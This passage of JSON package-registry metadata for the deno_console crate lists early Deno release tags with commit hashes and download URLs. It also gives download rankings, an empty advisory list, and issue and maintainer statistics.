y_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T05:12:59.085Z","dependent_packages_count":21,"downloads":1438981,"downloads_period":"total","dependent_repos_count":48,"rankings":{"downloads":3.9349360124387034,"dependent_repos_count":4.3307881570780085,"dependent_packages_count":1.9308396124865446,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":3.2541368682486014,"average":2.2517545255654583},"purl":"pkg:cargo/deno_console","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_console","docker_dependents_count":30,"docker_downloads_count":23282372,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_console","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_console/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_console/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_console/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_console/latest_version","dependent_packages_url":"https://packages.ecosyste.ms